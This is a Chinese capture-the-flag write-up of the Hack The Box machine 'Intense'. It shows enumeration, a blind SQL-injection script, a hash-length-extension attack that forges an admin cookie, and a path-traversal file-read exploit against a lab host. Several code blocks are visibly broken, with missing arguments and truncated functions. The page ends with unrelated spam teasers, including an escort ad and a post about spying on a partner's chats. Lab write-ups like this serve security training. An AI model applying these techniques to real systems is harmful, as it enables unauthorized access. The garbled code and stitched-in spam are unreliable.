intense靶场-获取User权限

访客4年前黑客工具1096

出品|MS08067实验室(www.ms08067.com)


本文作者:jokelove(Ms08067内网安全小组成员)

Intense是HTB中一个难度中上的靶场,需要参与者具备下述能力:

1. Python源码审计

2. SQL注入原理

3. SNMP远程命令执行

4. 栈溢出与ROP

开启Intense靶场环境之后,目标IP:10.10.10.195



0x01 信息收集

发现TCP端口开放情况

root@kali# nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.195
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 14:58 EDT
Nmap scan report for 10.10.10.195
Host is up (0.36s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

对开放端口进行进一步识别

root@kali# nmap -p 22,80 -sC -sV -oA scans/nmap-tcpscripts 10.10.10.195
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 14:59 EDT
Nmap scan report for 10.10.10.195
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b4:7b:bd:c0:96:9a:c3:d0:77:80:c8:87:c6:2e:a2:2f (RSA)
| 256 44:cb:fe:20:bb:8d:34:f2:61:28:9b:e8:c7:e9:7b:5e (ECDSA)
|_ 256 28:23:8c:e2:da:54:ed:cb:82:34:a1:e3:b2:2d:04:ed (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Intense - WebApp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.84 seconds

对UDP端口进行识别

root@kali# nmap -sU -p- --min-rate 10000 -oA scans/nmap-alludp 10.10.10.195
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-08 15:33 EDT
Nmap scan report for 10.10.10.195
Host is up (0.013s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds


这里发现SNMP端口开放,可以尝试使用snmpwalk来探测是否存在敏感信息

使用SNMP进行探测

root@kali# snmpwalk -v 2c -c public 10.10.10.195
SNMPv2-MIB::sysDescr.0=STRING: Linux intense 4.15.0-55-generic #60-Ubuntu *** P
Tue Jul 2 18:22:20 UTC 2019 x86_64
SNMPv2-MIB::sysObjectID.0=OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DI *** AN-EVENT-MIB::sysUpTimeInstance=Timeticks: (18407) 0:03:04.07
SNMPv2-MIB::sysContact.0=STRING: MeSNMPv2-MIB::sysName.0=STRING: intense
# 省略部分信息 ..
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0=No more variables left in this MIB
View (It is past the end of the MIB tree)


snmpwalk没有获取到任何有用的敏感信息

利用上述过程,将信息进行总结:

目标IP10.10.10.195
开放端口80/http 21/ssh 161/snmp
操作系统Ubuntu Bionic 18.04
WEB应用Nginx/1.14.0
SSH版本OpenSSH 7.6p1

通过Vulmon可以进一步对信息进行完善:

Vulmon 是一个漏洞检索引擎,可以通过应用版本查询相关漏洞情况

版本号漏洞情况漏洞说明
Ubuntu Bionic 18.04CVE-2018-13405https://vulmon.com/vulnerabilitydetails?qid=CVE-2
Nginx/1.14.0CVE-2020-5505https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-5505&scoretype=cvssv2
OpenSSH 7.6p1

CVE-2018-15473

CVE-2017-15906

https://vulmon.com/searchpage?q=openssh+7.6&sortby=byrelevance&page=1

通过对CVE的鉴别分析,操作系统、WEB服务器、SSH均不存在可供利用的弱点。

0x02?业务应用分析 - 80端口

WEB应用如下

1610086179_5ff7f72369a13fff4f698.png!small?1610086179421

用户名/口令: guest/guest

登录入口: /login

源码位置: /src.zip

测试登录之后的功能

1610086204_5ff7f73c2a975813e591a.png!small?1610086204268

的位置:/submit

目录爆破

root@kali# gobuster dir -u http://10.10.10.195 -w
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -o
scansgobuster-root-medium
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.195
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/07/05 15:10:16 Starting gobuster
===============================================================
/home (Status: 200)
/login (Status: 200)
/submit (Status: 200)
/admin (Status: 403)
/logout (Status: 200)
===============================================================
2020/07/05 15:19:16 Finished
===============================================================

注入测试

1610086249_5ff7f76966c2f845ae032.png!small?1610086249272

利用上述过程,可得到以下信息:

1. 得到应用源码

2. submit存在注入

3. 存在管理员入口 /admin

0x03 分析应用源码

分析登录逻辑

前端将用户名密码发送到 /postlogin 中

@app.route("/postlogin", methods=["POST"])
def postlogin():
# 尝试登录,如果成功,返回用户信息
data=try_login(request.form)
if data:
resp=make_response("OK")
# 创建一个session保存登录凭证
session=lwt.create_session(data)
cookie=lwt.create_cookie(session)
resp.set_cookie("auth", cookie)
return resp
return "Login failed"

分析 try_login 代码

def try_login(form):
""" Try to login with the submitted user info """
if not form:
return None
username=form["username"]
# 这里的password是经过hash_password处理过的
password=hash_password(form["password"])
result=query_db("select count(*) from users where username=? and secret=?", (username, password), one=True)
if result and result[0]:
return 
return None

由于存在数据库中的密码是hash过的,所以我们有两种 *** :

  • 破解hash

  • 通过生成Cookie的方式绕过登录

获取admin权限

爆破获得数据库存在的用户信息

时间盲注,可以使用SQLMap直接Dump,这里主要是使用编写的脚本

#!/usr/bin/env python3
import requests
import string
import sys
def brute_user(res):
for c in string.ascii_lowercase + string.digits:
sys.stdout.write(f"\r[*] Trying username: {res}{c.ljust(20)}")
sys.stdout.flush()
resp=requests.post(
"http://10.10.10.195/submitmessage",
data=f"message='||(select username from users where username LIKE
'{res + c}%' and load_extension('a'))||'",
headers=")
brute_user("")
print("\r" + "".ljust(80))

1610086424_5ff7f818e977c40e3ae0b.png!small?1610086424803

获取 hash 如下:

admin:f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105
guest:84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec

尝试爆破

hashcat -m 1400 https://www.freebuf.com/articles/web/hashes /content/wordlists/rockyou.txt --user

未爆破成功admin的密码

分析Session的产生机制

create_session 代码

def create_session(data):
""" Create session based on dict
@data: ;"
return session.encode()

create_cookie代码

def create_cookie(session):
# 重点:这里传入的session也经过处理
cookie_sig=sign(session)
return b64encode(session) + b'.' + b64encode(cookie_sig)

可以看到,Cookie主要是将字典的值转换成"key=value;key2=value2"的形式进行base64编码

对guest的session值还原


root@kali# echo
"dXNlcm5hbWU9Z3Vlc3Q7c2VjcmV0PTg0OTgzYzYwZjdkYWFkYzFjYjg2OTg2MjFmODAyYzBkOWY5YTNj
M2MyOTVjODEwNzQ4ZmIwNDgxMTVjMTg2ZWM7.QFyViArMNX8PRBdR1TZ7+0zPOsOAU5loeuTzGSKXig8=
" | cut -d. -f1 | base64 -d
username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c
186ec;

所以,我们只要能够获取到secret即可以绕过登录。

备注:这里的secret是经过sign函数处理过的,跟从数据库中获取的secret有差别

产生需要的secret

分析sign函数

def sign(msg):
""" Sign message with secret key """
return sha256(SECRET + msg).digest()

SECRET是一个随机数

SECRET=os.urandom(randrange(8, 15))

随机数在 8-15范围内,我们可以直接进行爆破

def try_signature(cookie):
res=requests.get("%s/admin" % URL, cookies=)
return res.status_code==200
append=';username=admin;secret=%s;' % admin_secret
auth_cookie=session.cookies["auth"]
b64_data, b64_sig=auth_cookie.split(".")
data=base64.b64decode(b64_data)
sig=base64.b64decode(b64_sig)
for key_len in range(8, 16):
(new_sig, new_data)=hashpumpy.hashpump(sig.hex(), data, append, key_len)
new_sig=base64.b64encode(binascii.unhexlify(new_sig)).decode("UTF-8")
new_data=base64.b64encode(new_data).decode("UTF-8")
cookie="%s.%s" % (new_data, new_sig)
if try_signature(cookie):
print("Found keylength=%d cookie=%s" % (key_len, cookie))

返回结果:

757365726e616d653d67756573743b7365637265743d3834393833633630663764616164633163623
836393836323166383032633064396639613363336332393563383130373438666230343831313563
31383665633b80000000000000000000000000000000000000000000000003303b757365726e616d6
53d61646d696e3b7365637265743d6631666331323031306330393430313664656637393165313433
35646466646361656363663832353065333636333063306263393332383563323937313130353b

修改Cookie值进行登录:

1610086712_5ff7f9386fe7dd501cad6.png!small?1610086712515

0x05 实现任意文件读取

首先分析admin权限具有的功能

@admin.route("/admin")
def admin_home():
if not is_admin(request):
abort(403)
return render_template("admin.html")
@admin.route("/admin/log/view", methods=["POST"])
def view_log():
if not is_admin(request):
abort(403)
logfile=request.form.get("logfile")
if logfile:
logcontent=admin_view_log(logfile)
return logcontent
return ''
@admin.route("/admin/log/dir", methods=["POST"])
def list_log():
if not is_admin(request):
abort(403)
logdir=request.form.get("logdir")
if logdir:
logdir=admin_list_log(logdir)
return str(logdir)
return ''

针对 log 函数

#### Logs functions ####
def admin_view_log(filename):
if not path.exists(f"logs/{filename}"):
return f"Can't find {filename}"
with open(f"logs/{filename}") as out:
return out.read()
def admin_list_log(logdir):
if not path.exists(f"logs/{logdir}"):
return f"Can't find {logdir}"
return listdir(logdir)

这里明显存在文件读取和目录泄露的漏洞,对输入的参数未作任何过滤

  • 测试漏洞是否存在

    测试目录泄露

漏洞位置:/admin/log/dir

参数:godir=.

1610086798_5ff7f98e81bb9933cc479.png!small?1610086798412

测试文件读取

漏洞位置: /admin/log/view

参数: logfile=https://www.freebuf.com/articles/app.ini

1610086810_5ff7f99a381204e3f896e.png!small?1610086810203编写利用脚本

#!/usr/bin/env python3
import base64
import binascii
import requests
import subprocess
from cmd import Cmd
class Term(Cmd):
prompt="intense> "
def __init__(self):
Cmd.__init__(self)
# Get Cookie
resp=requests.post(
"http://10.10.10.195/postlogin",
data=,
)
print(resp.text)
def precmd(self, args):
if len(args.split(" ")) > 2:
c=args.split(" ", 2)[0]
args=f"help {c}"
return args
term=Term()
try:
term.cmdloop()
except KeyboardInterrupt:
print()

0x06 结论

user.txt 位置在 /home/user/user.txt , 可以直接获取。

这里可以通过脚本枚举所有文件夹

intense> ls /home/user/user.txt
#707580d2...

原文链接: https://0xdf.gitlab.io/2020/11/14/htb-intense.html?

参考链接: https://www.romanh.de/writeup/htb-intense


MS08067实验室官网:www.ms08067.com

公众号:" Ms08067安全实验室"

Ms08067安全实验室目前开放知识星球: WEB安全攻防,内网安全攻防,Python安全攻防,KALI Linux安全攻防,二进制逆向入门

最后期待各位小伙伴的加入!


相关文章

杭州临平商务陪伴儿上门翟宁

杭州临平商务陪伴小学妹上门【翟宁】,上海是一座成功人士的聚集地,对商业模特的需求也是比较大的,今天明星商务分享模特访梦,年龄呼和浩特 男 34,婚姻:未婚,学历:高中,气质:杭州临平商务陪伴小学妹上门...

怎样才能防止黑客攻击(怎样才能防止黑客攻击别人)

怎样才能防止黑客攻击(怎样才能防止黑客攻击别人)

本文目录一览: 1、如何防范黑客入侵的方法 2、如何防止网站被黑客攻击? 3、怎样防范黑客攻击? 4、防止黑客攻击的方法有哪些? 5、怎么防止黑客攻击? 如何防范黑客入侵的方法 网络...

怎样查看女朋友全部的QQ聊天记录

. 宝宝感冒发烧是经常能发生的事,宝宝身体脆弱又不能随便用药打针。那么宝宝发烧了该怎么退烧呢,哪些退烧方式是错误的,下面友谊长存小编就就来和大家说一说。 1、根据体温处理不同情况 首先看一下宝宝...

手机root什么意思(安卓手机root有什么好处吗)

手机root什么意思(安卓手机root有什么好处吗)

ROOT在安卓上非常常见,不同安卓版本,不同型号,不同品牌都可以实现ROOT权限 对于ROOT,初入安卓的你,可能不理解,百度一下这个单词,解释为“根”,似乎跟 手机扯不上一点关系。 安卓起...

戴安娜黑客(戴安娜解密)

戴安娜黑客(戴安娜解密)

本文导读目录: 1、朴璐美的所有作品? 2、DC漫画《超人》的第一部漫画叫什么名字? 3、骇客交锋的演职员表 4、以前有部外国的科幻片一个半人半机器的人带个盾牌 5、街头实验:叫年轻女...

盖楼房游戏(梦见盖楼房正在施工)

1、梦见自己家中盖房子,预示着获得重生,一切将变得十分的美好,大吉大利。2、梦见亲戚家盖房子,预示着身体会十分的健康。3、女人梦见自己盖房子,预示着。 1、梦见自家盖房预示着获重切变十美吉利2、梦见亲...